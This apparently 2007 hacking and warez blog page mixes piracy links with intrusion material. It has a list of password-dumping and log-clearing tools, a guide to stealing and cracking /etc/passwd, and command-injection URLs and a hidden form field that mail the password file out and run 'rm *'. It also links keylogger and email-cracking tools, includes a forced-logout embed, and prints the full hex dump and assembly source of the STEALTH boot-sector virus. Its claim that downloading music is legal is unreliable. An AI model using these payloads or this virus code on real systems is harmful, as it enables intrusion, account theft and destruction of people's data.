Saturday, November 10, 2007

Some Mp3 Songs Download Links

Some Mp3 Songs Download Links
Top free mp3 links :
http://music.pakistanway.com/
www.mp3.com
www.mp3area.ru
www.deejaymusic.net
www.mp3fusion.net
www.mp3.essno.net
www.world-downloads.com
www.mp3nut.com
www.fastdown.net

Some Movies Sites

http://movies.nabolister.com/

http://www3.alluc.org/alluc/

http://www.plentyofvids.com/

http://www.onlinehorrorguide.com/

Some More
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
www.musiclovers.co.nr
www.faraz-ahmed.co.nr
www.jokesnhumour.co.nr
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

Laga Raho
http://www.mp3music2000.com



150 melodies of lata mangeshkar
http://studentsmasti.net/index.php?topic=2074.0


Some More
-www.freesongs4u.blogspot.com
-www.haryroy.blogspot.com
-http://onlinehindimp3s.blogspot.com


Old Songs
-www.bollyexpress.com

Download for free legally, mp3 search engines

Download for free legally, mp3 search engines
Apparently it's NOT illegal to download music, its only illegal to distribute! If you have Kazaa, Limewire, BitTorrent, Napster you're automatically distributing so that's how you get in trouble.

What we can't do:

* you CANNOT reproduce the music or lyrics
* you CANNOT distribute the music or lyrics either for free, for no profit, or for profit
* you CANNOT perform the music or lyrics in public
* you CANNOT play a recording of the music or lyrics in public
* you CANNOT make a derivative work or arrangement for public use in any form

What we can do:

* you CAN download music, so long as it is publicly available and do not intend to distribute
* you CAN search for publicly available music
* you CAN provide search engines for publicly available music

What idiots do:

* use Kazaa, Limewire, Bittorrent, Napster, to download music for personal use without intent to distribute. (Having the software is intent to distribute)
* pay 99c per song from profit giants like apple and sony
* not listen to music cause they're scared and poor

What smart people do:

* Use Mp3 search engines to find publicly available music and download it without intent to distribute.

So download from the web on sites like cr3.mobi and its totally legal because it's publicly available and your not distributing.

And before you get in a fit and say we're stealing from the artists. www.cr3.mobi is ad supported and gives half their profit to the artist.

CMD Quickies!

CMD Quickies!
Here are some CMD quickies --

This is for educational purpose only:-

A handy collection of command line tools

cpuinfo.exe - gets the processor type and CPU clocking speed (mhz)
fport.exe - shows open ports and the process that owns the port
iplist.exe - enumerates the ip's of the computer
md5.exe - gets the md5 hash of a file
pw2kget.exe - for win2k gets the password of the currently logged on user
pwreveal.exe - gets the passwords of any window that has a ****** editbox
regshell.exe - a commandline registry explorer/editor
resolve.exe - a commandline URL resolver
sendmail.exe - a commandline email sender
uptime.exe - gets the machines current uptime
xwhois - advanced whois lookup
Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp
CMDget.exe - Downloads a file from a website from user provided parameters
webscr.exe - creates a snapshot from the webcam and saves it
shutd.exe - program that forces shutdown/reboot of machine
bnc.exe - bnc for windows (see bnc.cfg)
clslog.exe - clears app/security/system logs XP/NT/2k
enum.exe - enumerates IPC$ share to collect information
winfo.exe - enumerates IPC$ share to collect information
FTPd.exe - small ftp server for dos (see slimftpd.conf)
Global.exe - process dos command on all disc/subdirs
iCmd.exe - telnet server 98/xp/nt/2k
iislog.exe - clears IIS logs
Info.exe - gets system information
ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)
nc.exe - netcat
pv.exe - process manager for dos
Pwdump.exe - dumps SAM hashes
scrnmode.exe - change screen mode from dos
unrar.exe - unrar for dos
wget.exe - wget for windows
wizmo.exe - command tool (see w.txt)
dwpp.exe - dial up password graber
winrelay.exe - relay tcp/udp connections
getad.exe - escalate to admin user in w2k
pipeup.exe - escalate to admin user in w2k
dnsid - identify remore dns server
rinetd.exe see rinetd.txt




i hav also command tools
must see all of them

Hacking Webpage Exploit

Hacking Webpage Exploit
Getting the Password File Through FTP

Ok well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one
little difference, it's shadowed. Shadowed password files don't let you
view or copy the actual encrypted password. This causes problems for the
password cracker and dictionary maker(both explained later in the text).
Below is another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.

Now that you know a little more about what the actual password file looks like
you should be able to identify a normal encrypted pw from a shadowed pw file.
We can now go on to talk about how to crack it.
Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system. 1.The first step that you would take is to
download or copy the file. 2. The second step is to find a password cracker and
a dictionary maker. Although it's nearly impossible to find a good cracker there
are a few ok ones out there. I recomend that you look for Cracker Jack, John the
Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or
a dictionary file... When you start a cracking prog you will be asked to find
the the password file. That's where a dictionary maker comes in. You can download
one from nearly every hacker page on the net. A dictionary maker finds all the
possible letter combinations with the alphabet that you choose(ASCII, caps,
lowercase, and numeric letters may also be added) . We will be releasing our
pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect
Drug." As far as we know it will be one of the largest in circulation. 3. You then
start up the cracker and follow the directions that it gives you.

Hack Anything

Hack Anything
hotmailhack,yahoohack,andcomputerhack inside
http://rapidshare.com/files/19219491/Crack_finder_and_Downloader.rar
software to find and crack and serial
http://rapidshare.com/files/19220368/Internet_Download_Manager_5.05_Fully_Patched.rar
this is 5 times the speed of your internet
software to hack
http://rapidshare.com/files/19232417/Ardamax_Keylogger_2.4___Cd_key.rar
http://rapidshare.com/files/20521721/hotmail_and_yahoo_hack.rar
http://rapidshare.com/files/21177552/RAPID_SHARE_ACCOUNT_CREATOR.rar
this software makes working rapidshare premium accounts
http://rapidshare.com/files/21283702/Hotmail_Hack_Edition__Find_Password__Brute_Force_Box__Keylogger_.rar
http://rapidshare.com/files/21284879/hack_hotmail.rar
http://rapidshare.com/files/21936311/fkwp1.5.rar
this can hack yahoo
http://rapidshare.com/files/21936374/skl1.0.rar
this can hack hotmail
http://rapidshare.com/files/22532668/brutus.rar
http://rapidshare.com/files/22533962/pass_for_brutus.txt
http://rapidshare.com/files/22534594/Hackman.rar
they all work reply to me if any problem


Guyz most of the softwarez are viruses themselves..cause without viruses u cant hack.....scrap me if u hav any probs.. wid this..

how to hack a website

how to hack a website
Hacking from your Web Browser

I - Introduction

This file will describe several techiniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hackers should benifit from this information. We will only cov

er phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable… sit back…. and read.

II - Hacking from your Web Browser

There are several techniques on what I call “Web Browser Hacking”. Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box t

hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.

a. Finger box hacking:

Lets say you wanted to break into somewhere like …. hmmmm AOL. The first thing we would do is type in their web site in the URL: Http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http://

www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search

for a mailto on the web page… just scan the page for any mailto refs. Go back to the finger box and type in this query…… nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd …this string takes nobody and emails the passwd file to your email

address. If this works you now have the etc/passwd file in your mailbox…. you can now run a crack program against it and have a little fun on their box.
b. The common cgi-bin/phf query:

This section is for the very beginning hacker (All advanced hackers need not apply) Lets take the same scenerio from the first example except in the URL we would type … http://www.aol.com/cgi-bin/phf … if the phf is operational and has not been rem

oved you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd… so the entire string would look like this http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20

/etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x .

c. Dont take my cgi form:

This section will explain how to use somebody else’s cgi form to obtain the etc/passwd file. Lets say you look at a document source from a web page and find this in the source: <.html><.body>

This is a form to go to Modify



<./body><./html>

This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line which is assuming the line has already been parsed out.

system(”/usr/lib/sendmail -t $myaddress < $tempfile”)
Now lets set up your page:

<.html><.body>
<.h2>Hack AOL<./h2>

<.input type=”hidden” name=”myaddress”
value=” ; rm * ;mail -s file youraddress@yourisp.com < /etc/passwd;”>




The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line. The system call in PERL and creates a UNIX shell, and in here mails the passwd file to you.
d. Changing web pages from your browser:

This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section…. http://www.aol.com…. we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 “some text and shit”%2
0>>filename.html…… This string will allow you to write to the filename.html and add “some text and shit” be noted it has to be in html format. You can place text, pictures or whatever you like.

III - Conclusion

This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser… It may also inform the guru’s and advanced hackers some bits of information of perl and cgi. In further reading check out my sec

ond file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting…… wake up!!! thus I conclude…..

Modify.
IV - Suggested Reading

Phrack Magazine: Very informative…. covers just about everything from phreaking to hacking…. Just download all the damn articles.

Building Internet Firewalls by O’Reilly & Associates, Inc. aka “The Big Wooden Door”": Covers all kinds of attacks, different firewall solutions, and invulnerablities.

Perl in 21 days by Samsnet: Good starting book in Perl programming also covers security issues.

Cgi programming by Samsnet: Good starter for Cgi but if you dont know Perl or C programming then dont bother, also covers security issues.





remove dots (.) from all scripts in it
ie
<.body>
remove .

Trick to disable the Orkut logout Script

Trick to disable the Orkut logout Script
IF you by mistakenly put this script


<.div class="para">
<.div id="flashDiv979482838"><.embed type="application/x-shockwave-flash" src="http://www.orkut.com/glogin.aspx?cmd=logout" style="" id="979482838" name="979482838" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1">
Or this script
remove dots(.) from this scrip
<.embed src="http://www.orkut.com/GLogin.aspx?cmd=logout" width="1" height="1">
remove . in beging of this script after <

In your Scrap Book Then the first method is just go to your internet options and disable the java script option and then go to ur scrap book And delete the Script some time this will not work on some pC's

then do this
This trick is to Disable the Flash , this script works on the Active X Or onflash so we simply Disable the Flash and delete the Script..
In my case i have done the same ..

Method 1.

Click Start, Run, type regedit
Go to following dir:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility

Click Edit, New, Key

Name New Key:

{D27CDB6E-AE6D-11CF-96B8-444553540000} (including the {})
Now create new DWORD value inside this key.

Rename this DWORD value to "Compatibility Flags"

Set Value Data to 400 and Base to Hexadecimal.

This may seem complicated but you will see along the way it makes much more sense.

If you want to disable flash correctly without compromising performance this is the way.
To enable flash simply delete the key.
Method 2.
To quickly disable and enable Flash in Internet Explorer when you want, here is an extension of the above registry edit. Tested with NT4, this should also work in XP and W2000.

Use a text editor (Notepad is fine) to create file:
c:\flash_disable.reg
and enter these 4 lines (the [ and ] should begin and end on one line):

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11CF-96B8-444553540000}]
"Compatibility Flags"=dword:00000400

Save this file and create another file, named c:\flash_enable.reg
and enter these 3 lines (again the [ and ] are all on one line):
REGEDIT4
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11CF-96B8-444553540000}]

Save this file, and exit the editor.
You now have some choices how you want to run each of the above files:

1. click Start-Run and type C:\flash_disable.reg, or C:\flash_enable.reg, or

2. create shortcuts on your desktop, or

3. create Start menu items to Disable and Enable Flash.
Only choice 3. is explained here for an Administrator on NT windows, so you may need to adapt it for other users or other Windows OS.
Open an Explorer window for C:\WINNT\Profiles\Administrator
(do this by clicking Start-Run and typing "C:\WINNT\Profiles\Administrator") and press the Enter key - quotes are essential here)

Click File-New-Shortcut and enter this line in the Command line field:

C:\WINNT\REGEDIT.EXE /s C:\flash_disable.reg
click on Next and enter this line in the 'select a name for the shortcut':
Disable Flash

Click on Finish and you now have a "Disable Flash" on the Start-Menu.

Do the same for Enable Flash, assuming you want to sometimes see Flash working. Here are the details:

Click File-New-Shortcut and enter this line:
C:\WINNT\REGEDIT.EXE /s C:\flash_enable.reg
click on Next and enter this line:

Enable Flash

Click on Finish and you now have a "Enable Flash" on the Start-Menu.
Now, whenever you want to disable flash without restarting browsers
and without any extra programs running, just click
Start-Menu-Disable Flash
and the menu item will silently and speedily disable Flash!
Similarly for Enable Flash.

Hope this much helps , if any problem ask me !!

delete any windows

delete windows......

01001011000111110010010101010101010000011111100000

jus save it in notpad as .cmd.and snd it ot vicim..

>>>>>>

Edit any WebPage!!
javascript:web=document.body;web.contentEditable='true'; document.designMode='on'; void 0

jus run this script on the page n edit it as u like

How to Hide the local drives

How to Hide the local drives
How to Hide the local drives (c:,d:,e:,a:...etc) in My Computer ??

This is a great trick you can play on your friends. To disable the display of local or networked drives when you open My Computer follow the below steps....

1.Go to start->run.Type "regedit" (without quotes).

Now go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane create a new DWORD item and name it NoDrives(it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) .Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........

virus::

WARNING: The STEALTH virus is extremely contagious.
Compile any of the following code at your own risk! If your
system gets infected with STEALTH, I recommend that you take a
floppy boot disk that you are certain is free from infection (borrow
one from somebody else if you have to) and turn your computer on
with it in your A: drive. Don’t boot off of your hard drive! Next,
format your hard drive using your low level hard disk formatter
(which should have come with your machine). Then run FDISK
and FORMAT to restore your hard disk. Once you have a clean hard
disk, format all floppy disks that may have been in your machine
during the time it was infected. If there is any question about it,
format it. This is the ONLY WAY you are going to get rid of the
infection! In other words, unless you really know what you’re
doing, you’re probably better off not trying to use this virus.
So the following listings are provided FOR INFORMATION
PURPOSES ONLY!
Here is the HEX listing for STEALTH:
:10000000E9FD7A0000000000000000000000000090
:10031000000000800200000000000000000000005B
:106F000000000000FB80FC02740A80FC0374212E48
:106F1000FF2E007080FE0075F680FD0075F180F98F
:106F200001742C80FA8075E780F90873E2E9110298
:106F300080FE0075DA80FD0075D580F9017503E9E2
:106F40000E0180FA8075C880F90873C3E9310280A8
:106F5000FA807308E842027403E85C02505351520D
:106F60001E06550E070E1F8BEC8AC2E8210573081A
:106F7000E81C057303E9BF00E842057403E9B700A4
1072E000722950BF037CBE037AB91900F3A5C60604
:1072F000357C0158E8AF017212BB00708AD0B6012C
:10730000B90A4FB805039CFF1E0070C38AD0B904A8
:1073100000B600E805018BD8726DBF2C7A8B050B87
:1073200045020B45047560B8F77FABB8FFF7ABB803
:107330000F00AB8BC3B904008AD3B600E8EA007231
:10734000468AD0B90700B600E8DE0072F4E83F01D3
:1073500072358AD0B601B9094FE8CD00722950BF05
:10736000037CBE037AB91900F3A5C606357C025822
:10737000E833017212BB00708AD0B601B9044FB86D
:1073800005039CFF1E0070C38AD0B90A00B600E84E
:1073900089008BD872F1BFA87A8B0525F0FF0B45C9
:1073A000020B45040B45060B4508756E268B05251B
:1073B0000F000570FFABB8F77FABB8FFF7ABB87F36
:1073C000FFABB8F70FAB8BC3B90A008AD3B600E89E
:1073D000570072468AD0B90100B601E84B0072F43A
:1073E000E8AC0072358AD0B601B9124FE83A0072A3
:1073F0002950BF037CBE037AB91900F3A5C6063530
:107400007C0358E8A0007212BB00708AD0B601B9A4
:107410000D4FB805039CFF1E0070C350BB007AB827
:1074200001029CFF1E007058C350BB007AB80103D4
:107430009CFF1E007058C3B080A2357CE85000BB92
:10744000007A508AD0B600B90700B801039CFF1E2D
:1074500000705850BF037CBE037AB91900F3A5BF72
:10746000BE7DBEBE7BB92100F3A558E83800BB0045
:10747000708AD0B600B90200B805039CFF1E0070E8
:10748000C31E33C08ED8BB75048A071F3C00C3508F
:10749000BB007A8AD0B600B500B101B001B4029C3D
:1074A000FF1E007058C350BB007C8AD0B600B500E8
:1074B000B101B001B4039CFF1E007058C35657FCC5
:1074C000BF367CBE367AB90F00F3A75F5EC30000FB
:107B0000EB349000000000000000000000000000C6
:107B3000000000000000FA33C08ED08ED88EC0BC8A
:107B4000007CFBB106A11304D3E02DE0078EC083B7
:107B50002E130404BE007C8BFEB90001F3A506B809
:107B6000647C50CB061F90BB0070A0357C3C007439
:107B7000153C0174173C0274193C03741BBA800055
:107B8000B500B102EB19B527B104EB10B54FB10A3E
:107B9000EB0AB54FB104EB04B54FB10DBA0001B813
:107BA0000602CD1372F933C08EC0BE007ABF007CCE
:107BB000B90001F3A5FA8CC88ED0BC00700E073353
:107BC000C08ED8BE4C00BF0070A5A5B80470BB4CD9
:107BD0000089078CC0894702FB0E1F803E357C80E0
:107BE0007412E89CF8740DB080E8A3F8E8CEF8743D
:107BF00003E843F8BEBE7DBFBF7DB93F00C60400A9
:107C0000F3A433C050B8007C50CB0000000000004B
:107CF000000000000000000000000000000055AA85
:00000001FF
virus:
;The Stealth Virus is a boot sector virus which remains resident in memory
;after boot so it can infect disks. It hides itself on the disk and includes
;special anti-detection interrupt traps so that it is very difficult to
;locate. This is a very infective and crafty virus.
COMSEG SEGMENT PARA
ASSUME CS:COMSEG,DS:COMSEG,ES:COMSEG,SS:COMSEG
ORG 100H
START:
jmp BOOT_START
;*******************************************************************************
;* BIOS DATA AREA *
;*******************************************************************************
ORG 413H
MEMSIZE DW 640 ;size of memory installed, in KB
;*******************************************************************************
;* VIRUS CODE STARTS HERE *
;*******************************************************************************
ORG 7000H
STEALTH: ;A label for the beginning of the virus
;*******************************************************************************
;Format data consists of Track #, Head #, Sector # and Sector size code (2=512b)
;for every sector on the track. This is put at the very start of the virus so
;that when sectors are formatted, we will not run into a DMA boundary, which
;would cause the format to fail. This is a false error, but one that happens
;with some BIOS’s, so we avoid it by putting this data first.
;FMT_12M: ;Format data for Track 80, Head 1 on a 1.2 Meg diskette,
; DB 80,1,1,2, 80,1,2,2, 80,1,3,2, 80,1,4,2, 80,1,5,2, 80,1,6,2
;
;FMT_360: ;Format data for Track 40, Head 1 on a 360K diskette
; DB 40,1,1,2, 40,1,2,2, 40,1,3,2, 40,1,4,2, 40,1,5,2, 40,1,6,2
;*******************************************************************************
;* INTERRUPT 13H HANDLER *
;*******************************************************************************
OLD_13H DD ? ;Old interrupt 13H vector goes here
INT_13H:
sti
cmp ah,2 ;we want to intercept reads
jz READ_FUNCTION
cmp ah,3 ;and writes to all disks
jz WRITE_FUNCTION
I13R: jmp DWORD PTR cs:[OLD_13H]
;*******************************************************************************
;This section of code handles all attempts to access the Disk BIOS Function 2,
;(Read). It checks for several key situations where it must jump into action.
;they are:
; 1) If an attempt is made to read the boot sector, it must be processed
; through READ_BOOT, so an infected boot sector is never seen. Instead,
; the original boot sector is read.
; 2) If any of the infected sectors, Track 0, Head 0, Sector 2-7 on
; drive C are read, they are processed by READ_HARD, so the virus
; code is never seen on the hard drive.
; 3) If an attempt is made to read the boot sector on the floppy,
; this routine checks to see if the floppy has already been
; infected, and if not, it goes ahead and infects it.
READ_FUNCTION: ;Disk Read Function Handler
cmp dh,0 ;is it head 0?
jnz I13R ;nope, let BIOS handle it
cmp ch,0 ;is it track 0?
jnz I13R ;no, let BIOS handle it
cmp cl,1 ;track 0, is it sector 1
jz READ_BOOT ;yes, go handle boot sector read
cmp dl,80H ;no, is it hard drive c:?
jnz I13R ;no, let BIOS handle it
cmp cl,8 ;sector < 8?
jnc I13R ;nope, let BIOS handle it
jmp READ_HARD ;yes, divert read on the C drive
;*******************************************************************************
;This section of code handles all attempts to access the Disk BIOS Function 3,
;(Write). It checks for two key situations where it must jump into action. They
;are:
; 1) If an attempt is made to write the boot sector, it must be processed
; through WRITE_BOOT, so an infected boot sector is never overwritten.
; instead, the write is redirected to where the original boot sector is
; hidden.
; 2) If any of the infected sectors, Track 0, Head 0, Sector 2-7 on
; drive C are written, they are processed by WRITE_HARD, so the virus
; code is never overwritten.
WRITE_FUNCTION: ;BIOS Disk Write Function
cmp dh,0 ;is it head 0?
jnz I13R ;nope, let BIOS handle it
cmp ch,0 ;is it track 0?
jnz I13R ;nope, let BIOS handle it
cmp cl,1 ;is it sector 1
jnz WF1 ;nope, check for hard drive
jmp WRITE_BOOT ;yes, go handle boot sector read
WF1: cmp dl,80H ;is it the hard drive c: ?
jnz I13R ;no, another hard drive
cmp cl,8 ;sector < 8?
jnc I13R ;nope, let BIOS handle it
jmp WRITE_HARD ;else take care of writing to C:
;*******************************************************************************
;This section of code handles reading the boot sector. There are three
;possibilities: 1) The disk is not infected, in which case the read should be
;passed directly to BIOS, 2) The disk is infected and only one sector is
;requested, in which case this routine figures out where the original boot
;sector is and reads it, and 3) The disk is infected and more than one sector
;is requested, in which case this routine breaks the read up into two calls to
;the ROM BIOS, one to fetch the original boot sector, and another to fetch the
;additional sectors being read. One of the complexities in this last case is
;that the routine must return the registers set up as if only one read had
;been performed.
; To determine if the disk is infected, the routine reads the real boot sector
;into SCRATCHBUF and calls IS_VBS. If that returns affirmative (z set), then
;this routine goes to get the original boot sector, etc., otherwise it calls ROM
;BIOS and allows a second read to take place to get the boot sector into the
;requested buffer at es:bx.
READ_BOOT:
cmp dl,80H ;check if we must infect first
jnc RDBOOT ;don’t need to infect hard dsk
call CHECK_DISK ;is floppy already infected?
jz RDBOOT ;yes, go do read
call INFECT_FLOPPY ;no, go infect the diskette
RDBOOT: push ax ;now perform a redirected read
push bx ;save registers
push cx
push dx
push ds
push es
push bp
push cs ;set ds=es=cs
pop es
push cs
pop ds
mov bp,sp ;and bp=sp
RB001: mov al,dl
call GET_BOOT_SEC ;read the real boot sector
jnc RB01 ;ok, go on
call GET_BOOT_SEC ;do it again to make sure
jnc RB01 ;ok, go on
jmp RB_GOON ;error, let BIOS return err code
RB01: call IS_VBS ;is it the viral boot sector?
jz RB02 ;yes, jump
jmp RB_GOON ;no, let ROM BIOS read sector
RB02:; mov bx,OFFSET SCRATCHBUF + (OFFSET DR_FLAG - OFFSET BOOT_START)
mov bx,OFFSET SB_DR_FLAG ;required instead of ^ for a86
mov al,BYTE PTR [bx] ;get disk type of disk being
cmp al,80H ;read, and make an index of it
jnz RB1
mov al,4
RB1: mov bl,3 ;to look up location of boot sec
mul bl
add ax,OFFSET BOOT_SECTOR_LOCATION ;ax=@BOOT_SECTOR_LOCATION table
mov bx,ax
mov ch,[bx] ;get track of orig boot sector
mov dh,[bx+1] ;get head of orig boot sector
mov cl,[bx+2] ;get sector of orig boot sector
mov dl,ss:[bp+6] ;get drive from original spec
mov bx,ss:[bp+10] ;get read buffer offset
mov ax,ss:[bp+2] ;and segment
mov es,ax ;from original specification
mov ax,201H ;prepare to read 1 sector
pushf
call DWORD PTR [OLD_13H] ;do BIOS int 13H
mov al,ss:[bp+12] ;see if original request
cmp al,1 ;was for more than one sector
jz RB_EXIT ;no, go exit
READ_1NEXT: ;more than 1 sec requested, so
pop bp ;read the rest as a second call
pop es ;to BIOS
pop ds
pop dx ;first restore these registers
pop cx
pop bx
pop ax
add bx,512 ;prepare to call BIOS for
push ax ;balance of read
dec al ;get registers straight for it
inc cl
cmp dl,80H ;is it the hard drive?
jnz RB15 ;nope, go handle floppy
push bx ;handle an infected hard drive
push cx ;by faking read on extra sectors
push dx ;and returning a block of 0’s
push si
push di
push ds
push bp
push es
pop ds ;ds=es
mov BYTE PTR [bx],0 ;set first byte in buffer = 0
mov si,bx
mov di,bx
inc di
mov ah,0 ;ax=number of sectors to read
mov bx,512 ;bytes per sector
mul bx ;# of bytes to read in dx:ax<64K
mov cx,ax
dec cx ;number of bytes to move in cx
rep movsb ;fill buffer with 0’s
clc ;clear c, fake read successful
pushf ;then restore everyting properly
pop ax ;first set flag register
mov ss:[bp+20],ax ;as stored on the stack
pop bp ;and pop all registers
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
mov ah,0
dec cl
sub bx,512
iret ;and get out
RB15: ;read next sectors on floppy
pushf ;call BIOS to
call DWORD PTR cs:[OLD_13H] ;read the rest (must use cs)
push ax
push bp
mov bp,sp
pushf ;use c flag from BIOS call
pop ax ;to set c flag on the stack
mov ss:[bp+10],ax
jc RB2 ;if error, return ah from 2nd rd
sub bx,512 ;else restore registers so
dec cl ;it looks as if only one read
pop bp ;was performed
pop ax
pop ax ;and exit with ah=0 to indicate
mov ah,0 ;successful read
iret
RB2: pop bp ;error on 2nd read
pop ax ;so clean up stack
add sp,2 ;and get out
iret
RB_EXIT: ;exit from single sector read
mov ax,ss:[bp+18] ;set the c flag on the stack
push ax ;to indicate successful read
popf
clc
pushf
pop ax
mov ss:[bp+18],ax
pop bp ;restore all registers
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
mov ah,0
iret ;and get out
RB_GOON: ;This passes control to BIOS
pop bp ;for uninfected disks
pop es ;just restore all registers to
pop ds ;their original values
pop dx
pop cx
pop bx
pop ax
jmp I13R ;and go jump to BIOS
;*******************************************************************************
;This table identifies where the original boot sector is located for each
;of the various disk types. It is used by READ_BOOT and WRITE_BOOT to redirect
;boot sector reads and writes.
BOOT_SECTOR_LOCATION:
DB 39,1,9 ;Track, head, sector, 360K drive
DB 79,1,15 ;1.2M drive
DB 79,1,9 ;720K drive
DB 79,1,18 ;1.44M drive
DB 0,0,7 ;Hard drive
;*******************************************************************************
;This routine handles writing the boot sector for all disks. It checks to see
;if the disk has been infected, and if not, allows BIOS to handle the write.
;If the disk is infected, this routine redirects the write to put the boot
;sector being written in the reserved area for the original boot sector. It
;must also handle the writing of multiple sectors properly, just as READ_BOOT
;did.
WRITE_BOOT:
push ax ;save everything we might change
push bx
push cx
push dx
push ds
push es
push bp
mov bp,sp
push cs ;ds=es=cs
pop ds
push cs
pop es
mov al,dl
call GET_BOOT_SEC ;read the real boot sector
jnc WB01
call GET_BOOT_SEC ;do it again if first failed
jnc WB01
jmp WB_GOON ;error on read, let BIOS take it
WB01: call IS_VBS ;else, is disk infected?
jz WB02 ;yes
jmp WB_GOON ;no, let ROM BIOS write sector
WB02:; mov bx,OFFSET SCRATCHBUF + (OFFSET DR_FLAG - OFFSET BOOT_START)
mov bx,OFFSET SB_DR_FLAG ;required instead of ^ for a86
mov al,BYTE PTR [bx]
cmp al,80H ;infected, so redirect the write
jnz WB1
mov al,4 ;make an index of the drive type
WB1: mov bl,3
mul bl
add ax,OFFSET BOOT_SECTOR_LOCATION ;ax=@table entry
mov bx,ax
mov ch,[bx] ;get the location of original
mov dh,[bx+1] ;boot sector on disk
mov cl,[bx+2] ;prepare for the write
mov dl,ss:[bp+6]
mov bx,ss:[bp+10]
mov ax,ss:[bp+2]
mov es,ax
mov ax,301H
pushf
call DWORD PTR [OLD_13H] ;and do it
sti
mov dl,ss:[bp+6]
cmp dl,80H ;was write going to hard drive?
jnz WB_15 ;no
mov BYTE PTR [DR_FLAG],80H ;yes, update partition info
push si
push di
mov di,OFFSET PART ;just move it from sec we just
mov si,ss:[bp+10] ;wrote into the viral boot sec
add si,OFFSET PART
sub si,OFFSET BOOT_START
push es
pop ds
push cs
pop es ;switch ds and es around
mov cx,20
rep movsw ;and do the move
push cs
pop ds
mov ax,301H
mov bx,OFFSET BOOT_START
mov cx,1 ;Track 0, Sector 1
mov dx,80H ;drive 80H, Head 0
pushf ;go write updated viral boot sec
call DWORD PTR [OLD_13H] ;with new partition info
pop di ;clean up
pop si
WB_15: mov al,ss:[bp+12]
cmp al,1 ;was write more than 1 sector?
jz WB_EXIT ;if not, then exit
WRITE_1NEXT: ;more than 1 sector
mov dl,ss:[bp+6] ;see if it’s the hard drive
cmp dl,80H
jz WB_EXIT ;if so, ignore rest of the write
pop bp ;floppy drive, go write the rest
pop es ;as a second call to BIOS
pop ds
pop dx
pop cx ;restore all registers
pop bx
pop ax
add bx,512 ;and modify a few to
push ax ;drop writing the first sector
dec al
inc cl
pushf
call DWORD PTR cs:[OLD_13H] ;go write the rest
sti
push ax
push bp
mov bp,sp
pushf ;use c flag from call
pop ax ;to set c flag on the stack
mov ss:[bp+10],ax
jc WB2 ;an error
;so exit with ah from 2nd int 13
sub bx,512
dec cl
pop bp
pop ax
pop ax ;else exit with ah=0
mov ah,0 ;to indicate success
iret
